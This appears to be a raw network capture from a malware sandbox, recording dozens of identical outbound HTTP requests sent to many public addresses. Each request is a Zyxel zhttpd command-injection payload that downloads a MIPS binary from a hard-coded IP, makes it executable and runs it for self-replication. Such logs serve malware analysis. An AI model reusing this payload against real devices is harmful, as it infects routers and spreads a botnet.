                                              Jan 29, 2024 07:03:52.052825928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4935192.168.2.143671893.54.162.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052851915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4936192.168.2.1448910150.215.76.78443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052905083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4937192.168.2.1454992101.156.232.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052930117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4938192.168.2.144005850.214.113.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.052959919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4939192.168.2.1455022212.6.52.215443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053011894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4940192.168.2.1457286154.153.184.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053050995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4941192.168.2.143740673.150.191.228443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053080082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4942192.168.2.145720468.67.193.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053107977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4943192.168.2.1443020156.197.45.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053148985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4944192.168.2.1444428153.203.55.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053189993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4945192.168.2.144396693.107.45.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053226948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4946192.168.2.1442260221.204.35.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053265095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4947192.168.2.145050642.179.123.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053287029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4948192.168.2.144848239.247.209.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053337097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4949192.168.2.144411046.89.97.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053366899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4950192.168.2.1433732107.60.143.116443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053406954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4951192.168.2.143871650.101.251.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053436041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4952192.168.2.144904819.127.167.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053509951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4953192.168.2.1445730187.245.212.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053513050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4954192.168.2.14524101.60.245.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053551912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4955192.168.2.1444450107.32.213.96443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053607941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4956192.168.2.145515687.162.16.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053646088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4957192.168.2.1432972139.97.13.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053656101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4958192.168.2.145202679.35.179.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053689957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4959192.168.2.144551463.81.162.147443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053740978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4960192.168.2.1458538122.208.114.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053764105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4961192.168.2.1437970117.4.64.224443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053833961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4962192.168.2.1459060193.192.28.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053841114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4963192.168.2.146034091.170.104.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053883076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4964192.168.2.1445248222.160.152.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053934097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4965192.168.2.1442388197.235.195.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.053966045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4966192.168.2.1435734145.93.122.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054018974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4967192.168.2.143663493.231.114.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054045916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4968192.168.2.144072882.24.238.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054080963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4969192.168.2.144604080.41.135.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054116964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4970192.168.2.1440018124.193.142.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054162979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4971192.168.2.144887219.144.229.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054193020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4972192.168.2.1435016191.6.239.253443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054231882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4973192.168.2.1439568137.128.164.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054265976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4974192.168.2.1442794126.95.41.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054301977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4975192.168.2.1458616158.2.130.111443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054330111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4976192.168.2.144231691.136.141.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054384947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4977192.168.2.1454072181.71.23.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054413080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4978192.168.2.14462862.168.165.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054447889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4979192.168.2.144790084.224.228.48443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054466963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4980192.168.2.1443454124.119.113.66443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054502964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4981192.168.2.1439144126.166.156.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054531097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4982192.168.2.1446852124.37.114.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054558992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4983192.168.2.144178852.125.189.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054586887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4984192.168.2.144144083.101.207.20443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054646015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4985192.168.2.14606968.238.52.237443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054658890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4986192.168.2.1441000143.138.106.151443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054682016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4987192.168.2.143871894.227.82.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054745913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4988192.168.2.145377041.0.140.39443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054788113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4989192.168.2.1438468140.240.194.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054816961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4990192.168.2.1437756218.89.47.225443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054856062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4991192.168.2.1460506156.233.53.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054903030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4992192.168.2.1449088162.173.238.170443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054939032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4993192.168.2.144530435.67.194.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.054987907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4994192.168.2.1460534186.56.161.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.055030107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4995192.168.2.1440660183.54.136.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.055066109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4996192.168.2.14494302.131.58.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.055104017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4997192.168.2.143317062.163.52.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:03:52.055133104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4998192.168.2.145432638.38.149.148443
                                              TimestampBytes transferredDirectionData
